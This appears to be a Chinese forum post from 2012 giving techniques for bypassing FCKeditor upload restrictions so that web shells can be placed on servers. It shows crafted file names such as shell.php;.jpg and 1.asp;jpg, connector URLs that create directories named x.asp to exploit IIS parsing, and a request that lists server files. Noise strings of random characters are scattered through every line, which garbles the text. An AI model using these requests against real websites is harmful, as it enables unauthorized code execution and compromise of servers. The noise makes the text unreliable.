很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg7 Z4 S7 b. N5 r; e1 r
& b- j+ H9 M2 \5 D提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。3 B3 ?& j' ~& [0 t0 m
: Y: j& g2 S' Z, J1 J/ W
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。 e9 a* P. z8 z/ e5 o9 `7 ^
3 `6 T; Y S! Z0 y" H# M/ e. O* j) H
突破建立文件夹:
9 v) m/ A, H( D" j0 R# I- K1 P$ r
% j6 [) }/ @3 Q7 F7 `, \" Eeditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp* \7 s+ y9 c3 m. Q2 ^- [
% j% o% I* S( V# m( H
参数:8 J8 H# u6 ? f* K/ F% ~
p! \( g$ o7 P# b- J+ C
当前目录名:CurrentFolder=/qing.asp
; @. h" X- O' Q) f- p& Y( t
: m+ v1 L4 B4 j3 M新的目录名:NewFolderName=x.asp
, o, F4 m- S7 S! J+ B9 [' x, _1 e6 J9 f/ z
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
+ l; T; y0 k; X
. m$ b$ b# s4 H9 l那么 x.asp 就已经建立生成了,此方法百试百灵!" _8 q- c( ?9 s" y. L
& |% P2 l7 b+ `" V/ x' T6 g( m新建文件夹参数 x.asp,基本都能搞定。3 N% \/ n5 ?3 v7 q- N) R8 g0 o
' `! P9 y G+ m4 ]* u4 D下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建9 ]( q/ D* i" h8 A: m, U& ?, G! b u
/ u+ f& z' u- i1 Caspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp. Y* d- m# F; P0 O
{2 z9 K: S. k6 F
获取文件列表
, A) J$ R% ~3 A6 T2 B aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F& G5 z, B' w* V2 \% ^# X
; }# C# h% [# m2 [( ]% C
|
发表于 2012-12-31 09:27:09
收藏
支持
反对